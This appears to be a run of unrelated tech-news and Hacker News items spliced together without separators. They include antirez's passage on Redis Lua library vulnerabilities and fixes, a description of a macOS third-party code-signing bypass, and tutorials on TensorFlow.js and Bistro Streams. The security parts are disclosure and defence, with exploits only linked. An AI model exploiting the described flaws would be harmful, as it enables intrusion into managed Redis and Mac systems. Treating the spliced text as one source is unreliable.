Honestly when the Redis Lua engine was designed, it was not conceived with this security model of the customer VS the cloud provider in mind. The assumption kinda was that you can trust who pokes with your Redis server. So in general the Lua libraries were not scrutinized for security. The feeling back then was, if you have access to Redis API, anyway you can do far worse.

However later things evolved, and cloud providers restricted the Redis API they expose to their customers, so that it became possible to provide managed Redis instances. However, while things like the CONFIG or DEBUG commands were denied, you can’t really avoid exposing EVAL and EVALSHA. Redis Lua scripting is one of the most used features in our community.

So gradually, without me really noticing, the Lua libraries also became an attack vector in a security model that Redis should now handle, because of the change in the way Redis is exposed and provided to the final user. As I said, in this model it is the managed Redis “cloud” provider, more than the Redis user, that is affected, but regardless it is a problem that must be handled.

What can we do in order to improve the current state of cloud providers’ security, regarding the specific problem with Lua scripting? I identified a few things that I want to do in the next months.

1. Lua stack protection. It looks like Lua can be compiled, with some speed penalty, in a way that ensures that it is not possible to misuse the Lua stack API. To be fair, I think that the assumptions Lua makes about the stack are a bit too trivial, with the Lua library developer having to constantly check if there is enough space on the stack to push a new value. Other languages at the same level of abstraction have C APIs that don’t have this problem. So I’ll try to understand if the slowdown of applying more safeguards in the Lua low level C API is acceptable, and in that case, implement it.

2. Security auditing and fuzz testing. Even if my time was limited I already performed some fuzz testing in the Lua struct library. I’ll continue with an activity that will check for other bugs in this area. I’m sure there are much more issues, and the fact that we found just a given set of bugs is only due to the fact that there was no more time to investigate the scripting subsystem. So this is an important activity that is going to be performed. Again at the end of the activity, I’ll coordinate with the Redis vendors so that they could patch in time.

3. From the point of view of the Redis user, it is important that when some untrusted data is sent to the Lua engine, an HMAC is used in order to ensure that the data was not modified. For instance there is a popular pattern where the state of a user is stored in the user cookie itself, to be later decoded. Such data may later be used as input for Redis Lua functions. This is an example where an HMAC is absolutely needed in order to make sure that we read what we previously stored. A minimal sketch of this sign-and-verify pattern is shown after this list.

4. More Lua sandboxing. There should be plenty of literature and good practices about this topic. We already have some sandboxing implemented, but my feeling from my security days is that sandboxing is ultimately always a cat and mouse game, and can never be executed in a perfect way. CPU / memory abuses for example may be too complex to track for the goals of Redis. However we should at least be sure that violations may result in a “graceful” abort without any memory content violation issue.

5. Maybe it’s time to upgrade the Lua engine? I’m not sure if newer versions of Lua are more advanced from the point of view of security, however we have the huge problem that upgrading Lua will result in old scripts potentially no longer working. That is a very big issue for the Redis community, especially since, for the kind of scripts Redis users normally develop, a more advanced Lua version is only marginally useful.
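
As a companion to point 3 above, here is a minimal sketch of the sign-and-verify pattern in Node.js, using only the built-in crypto module. The function names and key handling are illustrative, not a prescribed API:

const crypto = require('crypto');

const SECRET = process.env.COOKIE_HMAC_KEY; // keep the key out of Redis and Lua

// Attach an HMAC when storing state in the user cookie.
function sign(payload) {
  const mac = crypto.createHmac('sha256', SECRET).update(payload).digest('hex');
  return payload + '.' + mac;
}

// Verify the HMAC before the payload is ever passed to EVAL / struct.unpack().
function verify(cookieValue) {
  const i = cookieValue.lastIndexOf('.');
  if (i < 0) return null;
  const payload = cookieValue.slice(0, i);
  const mac = cookieValue.slice(i + 1);
  const expected = crypto.createHmac('sha256', SECRET).update(payload).digest('hex');
  const ok = mac.length === expected.length &&
             crypto.timingSafeEqual(Buffer.from(mac), Buffer.from(expected));
  return ok ? payload : null; // only verified data should reach the Lua engine
}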

# The issues

The problems fixed are listed in the following commits:

ce17f76b Security: fix redis-cli buffer overflow.
e89086e0 Security: fix Lua struct package offset handling.
5ccb6f7a Security: more cmsgpack fixes by @soloestoy.
1eb08bcd Security: update Lua struct package for security.
52a00201 Security: fix Lua cmsgpack library stack overflow.

The first commit is unrelated to this effort, and is a redis-cli buffer overflow that can be exploited only passing a long host argument in the command line. The other issues are the problems that we found on cmsgpack and the struct package.

The two scripts to reproduce the issues are the following:

https://gist.github.com/antirez/82445fcbea6d9b19f97014cc6cc79f8a

and

https://gist.github.com/antirez/bca0ad7a9c60c72e9600c7f720e9d035

Both were authored by the Apple Information Security team. However, the first was modified by me in order to make it cause the crash more reliably.

# Versions affected

Basically every version of Redis with Lua scripting is affected.

The fixes are available as the following Github tags:

3.2.12
4.0.10
5.0-rc2

The stable release (4.0.10) is also available at http://download.redis.io as usual.

Releases tarball hashes are available here:

https://github.com/antirez/redis-hashes

Please note that the versions released also include various other bug fixes, so it’s a good idea to read the release notes as well, to know what else you are upgrading by switching to the new version.

I hope to be back with a blog post in the future with the report of the security auditing that is planned for the Lua scripting subsystem in Redis.

Tensorflow.js – A Practical Guide

Let’s start with a simple example: building a neural network for the XOR logic gate.

The XOR problem

XOR is a good example problem for a feed-forward neural network: its outputs are not linearly separable, so it cannot be learned without a hidden layer.

Truth table of XOR:

A | B | A XOR B
0 | 0 |    0
0 | 1 |    1
1 | 0 |    1
1 | 1 |    0

From the truth table, we see that the output is 0 when both inputs are the same (both 0 or both 1), and 1 otherwise. Our neural network will learn to predict the output when A and B are given.

Basic setup

Create a new file named index.html and copy and paste the code given below.
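
The snippet embedded at this point in the original post did not survive extraction. A minimal index.html, assuming the CDN-hosted build of TensorFlow.js (the exact URL and version may differ from the original), could look like this:

<!DOCTYPE html>
<html>
  <head>
    <!-- Load TensorFlow.js from a CDN; no install or build step is needed -->
    <script src="https://cdn.jsdelivr.net/npm/@tensorflow/tfjs@latest/dist/tf.min.js"></script>
  </head>
  <body>
    <script>
      // The code from the steps below goes here, wrapped in an async
      // function so that model.fit() can be awaited.
      async function run() {
        // steps 1-4
      }
      run();
    </script>
  </body>
</html>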

That’s it! We’re done with the TensorFlow.js setup; we don’t need to do anything more.

Easy, right?

In TensorFlow.js, there are two ways to create models. We’ll be using the high-level Layers API to construct a model out of layers.

Step — 1 Creating dataset

We’ll create a dataset where the pairs of values of A and B serve as the training inputs (x_train) and the corresponding values of A XOR B serve as the training labels (y_train).
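
The original snippet for this step is missing; a hedged reconstruction using tf.tensor2d, with the four XOR input pairs and their labels, could look like this:

// The four XOR input pairs, shape [4, 2], and their labels, shape [4, 1].
const x_train = tf.tensor2d([[0, 0], [0, 1], [1, 0], [1, 1]]);
const y_train = tf.tensor2d([[0], [1], [1], [0]]);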

Step — 2 Creating a model

We’ll create two dense layers with non-linear activation functions. We’ll use the stochastic gradient descent optimizer with binary cross-entropy as our loss function.
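
A sketch of what such a model could look like with the Layers API; the hidden-layer size and learning rate are assumptions, not values from the original article:

// Two dense layers: a sigmoid hidden layer and a single sigmoid output unit.
const model = tf.sequential();
model.add(tf.layers.dense({ units: 8, inputShape: [2], activation: 'sigmoid' }));
model.add(tf.layers.dense({ units: 1, activation: 'sigmoid' }));

// Stochastic gradient descent with binary cross-entropy loss.
model.compile({ optimizer: tf.train.sgd(0.5), loss: 'binaryCrossentropy' });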

Step — 3 Train the model

Training the model is an asynchronous operation, so we need to await model.fit() before moving on.
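
Inside the async run() function from the setup sketch above, training might look like this (the epoch count is an assumption):

// Train on the XOR dataset; fit() returns a promise, so it must be awaited.
await model.fit(x_train, y_train, { epochs: 2000 });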

Step — 4 Test your model

The next step is to test our model. In our case the training and test sets are the same, i.e. x_train.
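
A sketch of the prediction step, run after training inside the same async function:

// Predict on the training inputs and print the four outputs; values close to
// 0 or 1 in the pattern of the truth table mean the network has learned XOR.
const prediction = model.predict(x_train);
prediction.print();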

We’ll get an output like this:

[[0.0064339], [0.9836861], [0.9835356], [0.0208658]]
Voila!

We have created a simple neural network and trained it in the browser. With machine learning moving to the client side, the data never leaves the client, and all training and inference happen there. This cuts down on time and costs, and keeps control of your machine learning algorithm right in the browser.

What are some algorithms you are looking to use TensorFlow.js for? Tell us in the comments below or join the YellowAnt community. Sign up for YellowAnt here.

Netflix and Alphabet will need to become ISPs, fast

This week completely scrambled the video landscape, and its implications are going to take months to fully understand.

First is the district court’s decision, announced just moments ago, to approve the merger of AT&T and Time Warner. That will create one of the largest content creation and distribution companies in the world when it closes. It is also expected to encourage Comcast to make a similar bid for 21st Century Fox, further consolidating the market. As Chip Pickering, CEO of pro-competition advocacy org INCOMPAS, put it, “AT&T is getting the merger no one wants, but everyone will pay for.”

But the second major story was the final (final final) repeal of the FCC’s net neutrality rules yesterday, which will allow telecom companies like AT&T to prioritize their own content over that of competitors. In the past, AT&T didn’t have all that much content, but the addition of Time Warner now gives it a library ranging from Warner Bros. to TBS, TNT, HBO and CNN. Suddenly, that control over prioritization just got a lot more powerful and profitable.

The combination of these two stories is spooking every video on demand service, from YouTube to Netflix. If Comcast bids and is successful in buying 21st Century Fox, then connectivity in the United States will be made up of a handful of gigantic content-library ISPs, and a few software players that will have to pay a premium to deliver their content to their own subscribers. While companies like Netflix have negotiated with the ISPs for years, the combination of these two news stories puts them in a significantly weaker negotiating position going forward.

While consumers still have some level of power — ultimately, ISPs want to deliver the content that their consumers want — a slow degradation of the experience for YouTube or Netflix could be enough to move consumers to “preferred” content. Some have even called this the start of the “cable-ification” of the internet. AT&T, for instance, has wasted no time in creating prioritized fast lanes.

That world is not automatic though, because Alphabet, Netflix and other video streaming services have options on how to respond.

For Alphabet, that will likely mean a redoubling of its commitment to Google Fiber. That service has been trumpeted since its debut, but has faced cutbacks in recent years that scaled back its original ambitions. That has meant that cities like Atlanta, which have held out for the promise of cheap and reliable gigabit bandwidth, have been left in something of a lurch.

Ultimately, Alphabet’s strategic advantage against Comcast, AT&T and other massive ISPs is going to rest on a sort of mutually assured destruction. If Comcast throttles YouTube, then Alphabet can propose launching in a critical (read: lucrative) Comcast market. Further investment in Fiber, Project Fi or perhaps a 5G-centered wireless strategy will be required to give it to the leverage to bring those negotiations to a better outcome.

Netflix, for its part, is going to have to get into the connectivity game one way or the other. Contracts with carriers like Comcast and AT&T are going to be more challenging to negotiate in light of today’s ruling and the additional power they have over throttling. Netflix does have some must-see shows, which gives it a bit of leverage, but so do the ISPs. It is going to have to do an end-run around the distributors to gain leverage similar to what Alphabet has up its sleeve.

One interesting dynamic I could see forthcoming would be Alphabet creating strategic partnerships with companies like Netflix, Twitch and others to negotiate as a collective against ISPs. While all these services are at some level competitors, they also face an existential threat from these new, vertically merged ISPs. That might be the best of all worlds given the shit sandwich we have all been handed this week.

One sad note though is how much the world of video is increasingly closed to startups. When companies like Netflix, which today closed with a market cap of almost $158 billion, can’t necessarily get enough negotiating power to ensure that consumers have direct access to them, no startup can ever hope to compete. America may believe in its entrepreneurs, but its competition laws have done nothing to keep the terrain open for them. Those implications are just beginning.

Show HN: Bistro Streams – A light-weight column-oriented stream analytics server


  ____  _     _
 | __ )(_)___| |_ _ __ ___  ___________________________
 |  _ \| / __| __| '__/ _ \ 
 | |_) | \__ \ |_| | | (_) |  C O L U M N S  F I R S T
 |____/|_|___/\__|_|  \___/ ___________________________

Bistro Streams does for stream analytics what column stores did for databases


What is Bistro Streams: a stream analytics server

Bistro Streams is a light-weight column-oriented stream analytics server which radically changes the way stream data is processed. It is a general-purpose server which is not limited to in-stream analytics but can also be applied to batch processing, including such tasks as data integration, data migration, extract-transform-load (ETL) or big data processing. Yet, currently its implemented features are more focused on stream analytics, with applications in IoT and edge computing.

Bistro Streams defines its data processing logic using column definitions as opposed to the existing approaches which process data using set operations. In particular, it does not use such difficult to comprehend and execute operations like join and group-by. More about the column-oriented approach to data processing can be found here:

How it works: a novel approach to stream processing

Internally, Bistro Streams is simply a database consisting of a number of tables and columns. These tables and columns may have their own definitions, and that is precisely how data is processed in the system: instead of continuously evaluating queries, Bistro Streams evaluates column and table definitions, deriving their outputs and population, respectively, from the existing data, as opposed to executing set-oriented queries as traditional systems do.

The main purpose of the Bistro Streams server is to organize interactions between this internal database (Bistro Engine) and the outside world. In particular, the server provides functions for feeding data into the database and reading data from it. These functions are implemented by connectors, which know how to interact with outside data sources and with the internal data engine. Thus the internal database is unaware of who changes its state and why - that role is played by connectors in the server. On the other hand, the Bistro Streams server is unaware of how this data state is managed and how new data is derived - that is the task of Bistro Engine.

Bistro Streams consists of the following components:

  • A schema instance is a database (Bistro Engine) storing the current data state. Yet, it does not have any threads and is not able to perform any operations itself - it exposes only a native Java interface.
  • A server instance (Bistro Streams) provides one or more threads and the ability to change the data state. The server knows how to work with the data, and its threads are intended to work exclusively with the data state. Yet, the server does not know what to do - it has no sources of data and no sources of commands to be executed.
  • Actions describe commands or operations with data which are submitted to the server by external threads (in the same virtual machine) and are then executed by the server. Internally, actions are implemented in terms of the Bistro Engine API.
  • A task is simply a sequence of actions. Tasks are used if we want to execute several actions sequentially.
  • A connector is essentially an arbitrary process which runs in the same virtual machine. Its task is to connect the server with the outside world. On one hand, it knows something about the outside world, for example, how to receive notifications from an event hub using a certain protocol. On the other hand, it knows how to work with the server by submitting actions. Thus connectors are intended for streaming data between Bistro Streams and other systems or for moving data into and out of Bistro Streams. A connector can also simulate events, for example, a timer is an example of a typical and very useful connector which regularly produces some actions like evaluating the database or printing its state.

Why Bistro Streams: benefits

Here are some benefits and unique features of Bistro Streams:

  • Bistro Streams is a light-weight server and is therefore well suited to running on edge devices. It is estimated that dozens of billions of connected things will come online by 2020, and analytics at the edge is becoming the cornerstone of any successful IoT solution. Bistro Streams is able to produce results and make intelligent decisions immediately at the edge of the network or directly on the device, as opposed to cloud computing, where data is transmitted to a centralized server for analysis. In other words, Bistro Streams is intended to analyze data as it is being created, producing results immediately and as close to the data source as possible.
  • Bistro Streams is based on a general-purpose data processing engine which supports arbitrary operations starting from simple filters and ending with artificial intelligence and data mining.
  • Bistro Streams is easily configurable and adaptable to various environments and tasks. It separates the logic of interaction with the outside world from the logic of data processing. It is easy to implement a custom connector to interact with specific devices or data sources, and it is also easy to implement custom actions to interact with the internal data processing engine.
  • Bistro Streams is based on a novel data processing paradigm which is conceptually simpler and easier to use than conventional approaches to data processing based on SQL-like languages or MapReduce. It is easier to define new columns than to write complex queries using joins and group-by, which can be difficult to understand, execute and maintain.
  • Bistro Streams is very efficient at deriving new data (the equivalent of query execution in classical systems) from small incremental updates, typically when new events are received. It maintains a dirty state for each column and table and knows how to propagate these changes to other elements of the database by updating their state incrementally via inference. In other words, if 10 events have been appended to and 5 events deleted from an event table with 1 million records, then the system will process only these 15 records and not the whole table.

Creating a schema

First, we need to create a database where all data will be stored and which will execute all operations. For example, we could create one table which has one column:

Schema schema = new Schema("My Schema");
Table table = schema.createTable("EVENTS");
Column column = schema.createColumn("Temperature", table);

Creating a server

A server instance is created by passing the schema object to its constructor as a parameter:

Server server = new Server(schema);

The server will be responsible for executing all operations on the data state managed by Bistro Engine. In particular, it is responsible for making all operations safe, including thread safety. After starting the server, we should not access the schema directly using its API, because that is the responsibility of the server; the server provides its own API for working with data.
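For example, starting the server might look like this (a minimal sketch, assuming a start() method on the Server class; the actual method name may differ):

// Start the server; from now on, all data operations go through the server API
server.start();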

Now the server is waiting for incoming actions to be executed.

Actions

An action represents one user-defined operation with data. Actions are submitted to the server and one action will be executed within one thread. There are a number of standard actions which implement conventional operations like adding or removing data elements.

For example, we could create a record, and then add it to the table via such an action object:

Map<Column, Object> record = new HashMap<>();
record.put(column, 36.6);
Action action = new ActionAdd(table, record);
server.submit(action);

The server stores the submitted actions in the queue and then decides when and how to execute them.

If we want to execute a sequence of operations then they have to be defined as a task. For example, we might want to delete unnecessary records after adding each new record:

Action action1 = new ActionAdd(table, record);
Action action2 = new ActionRemove(table, 10);
Task task = new Task(Arrays.asList(action1, action2), null);

server.submit(task);

This guarantees that the table will have at most 10 records; older records will be deleted by the second action. In fact, it is an example of how a retention policy can be implemented.

More complex actions can be defined via user-defined functions:

server.submit(
        x -> System.out.println("Number of records: " + table.getLength())
);

The server will execute this action and print the current number of records in the table.

Connectors

The server instance is not visible from the outside - it exposes only its action submission API within the JVM. The server itself knows only how to execute actions, while receiving or sending data is performed by connectors. A connector is supposed to have its own thread in order to be able to interact asynchronously with the outside world.

In fact, Bistro does not restrict what connectors can do - it is only important that they decouple the logic of interaction with external processes from the internal logic of action processing. In particular, connectors are used for the following scenarios:

  • Batch processing. Such a connector will simply load the whole or some part of the input data set into the server. It can do it after receiving certain event or automatically after start.
  • Stream processing. Such a connector will create a listener for certain event types (for example, by subscribing to a Kafka topic) and then submit an action after receiving new events. Its logic can be more complicated. For example, it can maintain an internal buffer in order to wait for late events and then submit them in batches. Or, it can do some pre-processing like filtering or enrichment (of course, this could be also done by Bistro Engine).
  • Timers. Timers are used for performing regular actions like sending output, checking the state of some external processes, evaluating the data state by deriving new data, or implementing some custom retention policy (deleting unnecessary data).
  • Connectors are also supposed to sink data to external event hubs or data stores. For example, in case some unusual behavior has been detected by the system (during evaluation), such a connector can append a record to a database or send an alert to an event hub.
  • A connector can also implement a protocol for accessing data stored in the server like JDBC. External clients can then connect to the server via JDBC and visually explore its current data state.

In our example, we can use a standard timer to simulate a data source by regularly adding random data to the table:

ConnectorTimer timer = new ConnectorTimer(server, 500); // Do something every 500 milliseconds
timer.addAction(
        x -> {
            long id = table.add();
            double value = ThreadLocalRandom.current().nextDouble(30.0, 40.0);
            column.setValue(id, value);
        }
);

After adding each new record, we want to evaluate the schema by deriving new data:

timer.addAction(new ActionEval(schema));

(In our example it will do nothing because we do not have derived columns with their custom definitions.)
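To see the evaluation do real work, we could also define a derived column. The snippet below is only a hypothetical sketch: the calculate(...) method, its lambda signature and the Fahrenheit column are assumptions about the Bistro Engine calc-column API and may differ from the actual interface:

// Hypothetical sketch: a derived column computed from the Temperature column.
// ActionEval would then (re)compute its values for newly added records.
Column fahrenheit = schema.createColumn("Fahrenheit", table);
fahrenheit.calculate(
        p -> (double) p[0] * 1.8 + 32.0, // convert Celsius to Fahrenheit
        column
);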

Once a connector has been configured it has to be started.
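A minimal sketch of the start-up and shut-down sequence (assuming start() and stop() methods on the connector and the server; the actual method names may differ):

// Start the timer connector so that it begins submitting its actions
timer.start();

// ... let the system run, then shut everything down
timer.stop();
server.stop();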

From the project folder (git/bistro/server) execute the following to clean, build and publish the artifact:

$ gradlew clean
$ gradlew build
$ gradlew publish

The artifact will be placed in your local repository from where it will be available in other projects.

In order to include this artifact into your project add the following lines to dependencies of your build.gradle:

dependencies {
    compile("org.conceptoriented:bistro-core:0.8.0")
    compile("org.conceptoriented:bistro-server:0.8.0")// Other dependencies
}

Ask HN: How to find a mental health professional?

We've been having a lot of great discussions here on HN lately about mental health, and the suggestion to seek professional help rings true.

But, depressed and burnt out and feeling isolated, the project of even finding a therapist in the first place can be overwhelming.

I live in a large city, where there are literally thousands of therapists, psychologists, psychiatrists, licensed social workers, life coaches, you name it. About half of them even accept my insurance.

How does one even begin to narrow the options down? After asking my GP and getting no suggestions, I'm at a complete loss.



Fixing Weak Wi-Fi Security


Even if your router still appears to work properly, the device has reached the end of its life when manufacturers stop supporting it with firmware updates, leaving it vulnerable to future cyberthreats. You can expect this to happen every three to five years. At that point, it is crucial to upgrade to a new piece of hardware.

The best way to check is to look up your router on the manufacturer’s website and read notes about its firmware releases. If there hasn’t been a firmware update in the last year, the router has probably been discontinued.

Among the routers affected by the VPNFilter malware, a significant portion of them were more than five years old, said Cisco’s Mr. Watchinski.

How did we get here in the first place? Historically, manufacturers have designed routers by cobbling together open-source software platforms with commodity components to produce base stations as cheaply as possible — with little care for long-term security, Mr. Fraser said.

“It is a miserable situation, and it has been from day one,” he said. But Mr. Fraser added that there were now “new world” routers with operating systems, tougher security and thoughtful features to make network management easy.

If it is time to update your router, rid yourself of some of these headaches by looking for a smarter router. Check for Wi-Fi systems that offer automatic updates to spare you the hassle of having to check and download updates periodically. Many modern Wi-Fi systems include automatic updates as a feature. My favorite ones are Eero and Google Wifi, which can easily be set up through smartphone apps.

The caveat is that smarter Wi-Fi systems tend to cost more than cheap routers that people are accustomed to. Eero’s base stations start at $199, and a Google Wifi station costs $119, compared with $50 for a cheap router. For both of these systems, you can also add base stations throughout the home to extend their wireless connections, creating a so-called mesh network.

Another bonus? Mr. Fraser noted that more modern Wi-Fi systems should have longer life spans because the companies sometimes relied on different revenue streams, like selling subscriptions to network security services.

For almost 11 yrs, hackers could easily bypass 3rd-party macOS signature checks

The Little Snitch firewall was one of at least eight third-party Mac security tools affected by a code-signing bypass.

For almost 11 years, hackers have had an easy way to get macOS malware past the scrutiny of a host of third-party security tools by tricking them into believing the malicious wares were signed by Apple, researchers said Tuesday.

Digital signatures are a core security function for all modern operating systems. The cryptographically generated signatures make it possible for users to know with complete certainty that an app was digitally signed with the private key of a trusted party. But, according to the researchers, the mechanism many macOS security tools have used since 2007 to check digital signatures has been trivial to bypass. As a result, it has been possible for anyone to pass off malicious code as an app that was signed with the key Apple uses to sign its apps.

The technique worked using a binary format, alternatively known as a Fat or Universal file, that contained several files that were written for different CPUs used in Macs over the years, such as i386, x86_64, or PPC. Only the first so-called Mach-O file in the bundle had to be signed by Apple. At least eight third-party tools would show other non-signed executable code included in the same bundle as being signed by Apple, too. Affected third-party tools included VirusTotal, Google Santa, Facebook OSQuery, the Little Snitch Firewall, Yelp, OSXCollector, Carbon Black’s Cb Response, and several tools from Objective-See. Many companies and individuals rely on some of the tools to help implement whitelisting processes that permit only approved applications to be installed on a computer, while forbidding all others.

The Stuxnet worm that targeted Iran’s uranium enrichment program eight years ago relied on digital signatures belonging to legitimate software developers. Last year, researchers said fraudulent code-signing was more widespread than previously thought and predated Stuxnet by about seven years. Most of those attacks involved obtaining Microsoft Windows-trusted signing certificates belonging to legitimate developers. The Apple forgery, by contrast, required no such certificate theft.

“It’s really easy,” Joshua Pitts, a senior penetration testing engineer at security firm Okta, said of the technique. When he discovered it in February, he quickly contacted Apple and the third-party developers. “This really scared the bejeebus out of me, so we went right to disclosure mode.”

Pitts said tools built into macOS weren’t susceptible to the bypass, which has been possible since the release of OS X Leopard in 2007. Okta has published more about the bypass here. The post demonstrated how the bypass caused the affected tools to show that a file named ncat.frankenstein was signed by Apple, even though it wasn't.

This is not the first time researchers have found a way to bypass signature checks in third-party tools. In 2015, for instance, a researcher published this hack subverting whitelisting in Google Santa. Patrick Wardle, the developer of the Objective-See tools and Chief Research Officer at Digita Security, said third-party tools including his own can almost always be bypassed when hackers directly or proactively target them.

“If a hacker wants to bypass your tool and targets it directly, they will win,” Wardle said. He went on to say that the bypass was the result of ambiguous documentation and comments Apple provided for using publicly available programming interfaces that make the signature checks work.

“To be clear, this is not a vulnerability or bug in Apple’s code... basically just unclear/confusing documentation that led to people using their API incorrectly,” Wardle told Ars. “Apple updated [its] documents to be more clear, and third-party developers just have to invoke the API with a more comprehensive flag (that was always available).”

Recovery of Lost Indigenous Languages by Optical Scanning of Old Wax Cylinders


In an 1878 North American Review description of his new invention, the phonograph, which transcribed sound on wax-covered metal cylinders, Thomas Edison suggested a number of possible uses: “Letter writing and all kinds of dictation without the aid of a stenographer,” “Phonographic books” for the blind, “the teaching of elocution,” and, of course, “Reproduction of music.” He did not, visionary though he was, conceive of one extraordinary use to which wax cylinders might be put—the recovery or reconstruction of extinct and endangered indigenous languages and cultures in California.

And yet, 140 years after Edison’s invention, this may be the most culturally significant use of the wax cylinder to date. “Among the thousands of wax cylinders” at UC Berkeley’s Phoebe A. Hearst Museum of Anthropology, writes Hyperallergic’s Allison Meier, “are songs and spoken-word recordings in 78 indigenous languages of California. Some of these languages, recorded between 1900 and 1938, no longer have living speakers.”




Such is the case with Yahi, a language spoken by a man called “Ishi,” who was supposedly the last surviving member of his culture when anthropologist Alfred Kroeber met him in 1911. Kroeber recorded nearly 6 hours of Ishi’s speech on 148 wax cylinders, many of which are now badly degraded.

“The existing versions” of these artifacts “sound terrible,” says Berkeley linguist Andrew Garrett in the National Science Foundation video at the top, but through digital reconstruction much of this rare audio can be restored. Garrett describes the project—supported jointly by the NSF and NEH—as a “digital repatriation of cultural heritage.” Using an optical scanning technique, scientists can recover data from these fragile materials without further damaging them. You can see audio preservationist Carl Haber describe the advanced methods above.

The project represents a scientific breakthrough and also a stark reminder of the genocide and humiliation of indigenous people in the American west. When he was found, “starving, disoriented and separated from his tribe,” writes Jessica Jimenez at The Daily Californian, Ishi was “believed to be the last Yahi man in existence because of the Three Knolls Massacre in 1866, in which the entire Yahi tribe was thought to have been slaughtered.” (According to another Berkeley scholar his story may be more complicated.) He was “put on display at the museum, where outsiders could watch him make arrows and describe aspects of Yahi culture.” He never revealed his name (“Ishi” means “man”) and died of tuberculosis in 1916.

The wax cylinders will allow scholars to recover other languages, stories, and songs from peoples destroyed or decimated by the 19th century “Indian Wars.” Between 1900 and 1940, Kroeber and his colleagues recorded “Native Californians from many regions and cultures,” the Berkeley project page explains, “speaking and singing; reciting histories, narratives and prayers, listing names for places and objects among many other things, all in a wide variety of languages. Many of the languages recorded on the cylinders have transformed, fallen out of use, or are no longer spoken at all, making this collection a unique and invaluable resource for linguists and contemporary community members hoping to learn about or revitalize languages, or retrieve important piece of cultural heritage.”

via Hyperallergic

Related Content:

Download 10,000 of the First Recordings of Music Ever Made, Courtesy of the UCSB Cylinder Audio Archive

Interactive Map Shows the Seizure of Over 1.5 Billion Acres of Native American Land Between 1776 and 1887

1,000+ Haunting & Beautiful Photos of Native American Peoples, Shot by the Ethnographer Edward S. Curtis (Circa 1905)

Josh Jones is a writer and musician based in Durham, NC. Follow him at @jdmagness



Elph wants to be the “Netscape for crypto”


Three-month-old Elph wants to make it easier for you to find and use blockchain-based apps. How? Through a portal that’s promising to enable users to click through to see how their crypto holdings are faring, to buy and sell CryptoKitties or to find and use other decentralized apps.

Its co-founder and CEO, Ritik Malhotra, says it will eventually be the “Netscape for crypto.”

If it sounds outlandish, that’s partly because there are still so few blockchain apps from which to choose. Malhotra and team trust that this will change over time, however, and investors seem to trust them, including The House Fund and numerous individual investors who just provided the company with a little less than a million dollars in pre-seed funding.

A large part of the appeal is the founders’ pedigree. Malhotra was a Thiel fellow, for example, stepping away from UC Berkeley in order to make the requisite two-year commitment demanded of the prestigious program. Malhotra and Tanooj Luthra, co-founder and CTO, had also previously co-founded and led a YC-backed startup, Streem, that sold to Box in 2014. Afterward, Luthra joined Coinbase as a senior engineer on Coinbase’s crypto team, learning the ins and outs of the nascent but fast-growing industry.

But the company’s premise is compelling, too. Most crypto outfits today require users to walk through numerous manual steps to create and store their wallet, and authenticate that they are who they say before they can start actively engaging with the service. With Elph, users simply sign up with an email and password, says Malhotra; Elph then handles account management across apps based on the unique ID that it assigns them.

“It’s an app store,” explains Luthra. “You log in, you see a bunch of decentralized apps, you click them and they open up. We’ve handled all the interfacing with the blockchain and done the heavy lifting in the background for you.”

These decentralized app developers don’t need to buy into Elph’s vision; they all respond to open web3 protocols that allow them to interact with the Ethereum blockchain and Ethereum smart contracts. Elph has been able to implement the web3 APIs in its app, meaning everyone is talking the same language.

Elph is also working on a developer SDK to make it even easier for developers to build blockchain-based apps.

Malhotra and Luthra seem to be carving their careers out of abstracting away the complexity of highly technical things. Streem built desktop software for cloud storage services, for example, enabling customers to stream files to their desktop environments. (Notably, it also raised just $875,000 from investors to build out its product.) More recently, while working at Coinbase, Luthra realized he was witnessing “this huge boom of new, decentralized apps coming out that are hard for anyone to access or use who isn’t fairly technical.” It’s “kind of like the internet in 1994 right now,” he says. “So we decided to simplify it.”

The company is opening up its public beta launch today, which you can check out here. Because most users need to be educated about which apps are being built, the portal today allows them to browse apps by category — much like sites like Netscape and Yahoo once did when the internet was still young and its content a confusing morass for web surfers.

The team has plainly paid attention to creating an engaging experience that aims to make finding and using these apps fun. As for how Elph accrues value for itself and its investors, the idea is to employ token mechanics, meaning that new features will be added over time by “maintainers” or people who work on the app store to either jazz it up or else rank apps for Elph and receive tokens as rewards in exchange for their efforts. (These tokens, presumably, will be available to trade over time on cryptocurrency exchanges that are easily accessed through . . . Elph.)

Elph isn’t the only outfit to identify this same opportunity. Coinbase, for example, last year rolled out Toshi, a browser for the Ethereum network that aims to provide universal access to financial services.

Still, it’s early days, obviously, and momentum appears to be building slowly. Today, there are roughly 3,000 decentralized apps up and running, roughly four times more than there were a year ago. Some day, believes Malhotra, there will be millions.

If Malhotra and Luthra play their cards right, Elph may help you find them.

Show HN: Node-android – Run Node.js on Android



Run Node.js on Android by rewriting Node.js in Java with a compatible API.

Third-party: libuvpp and libuv-java JNI code by Oracle.

Build

Clone the code, open Android Studio (1.*) and import the project.

For Eclipse ADT user, refer to https://github.com/InstantWebP2P/node-android/tree/adt

Javascript code injection

> adb shell am start -a android.intent.action.VIEW -n com.iwebpp.nodeandroid/.MainActivity -e js "var run = function () { return 'hello world'; }; run();"

Features

JS runtime

  • Rhino supported
  • Exposed node-android packages: com.iwebpp.node.http, com.iwebpp.node.stream, com.iwebpp.node.net, etc
  • Exposed node-android classes: com.iwebpp.node.EventEmitter2, com.iwebpp.node.Dns, com.iwebpp.node.Url, etc
  • Exposed node-android native context in JS standard scope as NodeCurrentContext alias NCC
  • Exposed Android API: android.util.Log
  • NodeJS compatible internal modules are available in JS standard scope
  • Exposed WebSocket classes: com.iwebpp.wspp.WebSocket, com.iwebpp.wspp.WebSocketServer

JS usage

TODO

  • API doc, more demos
  • JS runtime CommonJS/AMD compliance

Support us

  • Remote Work and Cloud Office Alliance QQ group: 463651269

License

(see LICENSE file)

Copyright (c) 2014-2017 Tom Zhou (iwebpp@gmail.com)

The End of Video Coding?


In the IEEE Signal Processing Magazine November 2006 article “Future of Video Coding and Transmission,” Prof. Edward Delp started by asking the panelists: “Is video coding dead? Some feel that, with the higher coding efficiency of the H.264/MPEG-4 . . . perhaps there is not much more to do. I must admit that I have heard this ‘compression is dead’ argument at least four times since I started working in image and video coding in 1976.”

People were postulating that video coding was dead more than four decades ago. And yet here we are in 2018, organizing the 33rd edition of Picture Coding Symposium (PCS).

